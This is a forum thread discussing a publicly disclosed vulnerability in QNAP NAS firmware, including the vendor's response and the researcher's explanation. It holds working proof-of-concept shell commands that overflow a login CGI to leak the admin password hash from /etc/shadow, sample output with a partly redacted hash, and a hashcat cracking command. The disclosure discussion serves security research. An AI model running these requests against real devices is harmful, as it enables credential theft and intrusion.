0-Day Critical Vulnerability In QNAP

Yep, default password for Admin ;)

Good one, I like SFL ;)

http://seclists.org/fulldisclosure/2017/Feb/2

*yawn*

I know it can be tiring waiting for jtr to finish...

Pro tip:

#kill -9 john 

Process Terminated.

#hashcat64 -a3 -m500 -w3

XXXXX != 0-day

XXXXX=?????

Remotely execute code (aka bind/remote shell) is highly unlikely (I would even dare to say impossible), but read the password hash and crackable with "John" - that's one step below - is fully functional.

Only difference between these two is time.

#1, what do you think of QNAP's response?

internal investigations have shown that the vulnerability is not easily exploited

QNAP's coding lacks of proper checkins, nothing to do with glibc, it's looks like that when checking the BT, but it's not.

For most of them, yes there is, but these lacking of some proper checkins.

The loops are only to easily get up to required chars to trigger things, instead of "manually type" +4000 chars. 

(It's actually one and same binary, but mentioned function are symlinked to the main binary (authLogin.cgi).

authLogout.cgi -> authLogin.cgi*
cgi.cgi -> authLogin.cgi*
jc.cgi -> authLogin.cgi*
language.cgi -> authLogin.cgi*
mediaGet.cgi -> authLogin.cgi*
qnapmsg.cgi -> authLogin.cgi*
sysinfoReq.cgi -> authLogin.cgi*

Below is also requests (base64 encoded) to retrieve the admin password (loaded in heap at address 0x0806ce56) that's loaded on heap from /etc/shadow.

Tested with my own device "QNAP TS-251+" and loaded with latest FW Version 4.2.2 (Build 20161214)

[HTTPS]
# echo -en "GET /cgi-bin/cgi.cgi?u=admin&p=`for((i=0;i<4467;i++));do echo -en "B";done | base64 -w 0 ; echo -en "D\x56\xce\x06\x08" | base64 -w 0` HTTP/1.0\nHost: BUG\n\n" | ncat --ssl 192.168.5.7 443 | grep glibc
*** glibc detected *** $1$$8lBa9PhdBbp9/AeeTXXXXX: free(): invalid next size (normal): 0x0806e510 ***
#

[HTTP]
#
echo -en "GET /cgi-bin/cgi.cgi?u=admin&p=`for((i=0;i<4467;i++));do echo -en "\xff";done | base64 -w 0 ; echo -en "D\x56\xce\x06\x08" | base64 -w 0` HTTP/1.0\n\n" | ncat 192.168.5.7 8081 | grep glibc
*** glibc detected *** $1$$8lBa9PhdBbp9/AeeTXXXXX: free(): invalid next size (normal): 0x0806e510 ***
#

For other's background information, bashis also uncovered the Axis critical security vulnerability.

bashis strikes again!

#1, thanks for sharing. I edited the title and inserted the summary into the opening to make it clear. Let me know if that works.

I'd email someone at QNAP but I don't know who to speak with. It has been so long since I talked to anyone at QNAP and I am not sure who is there.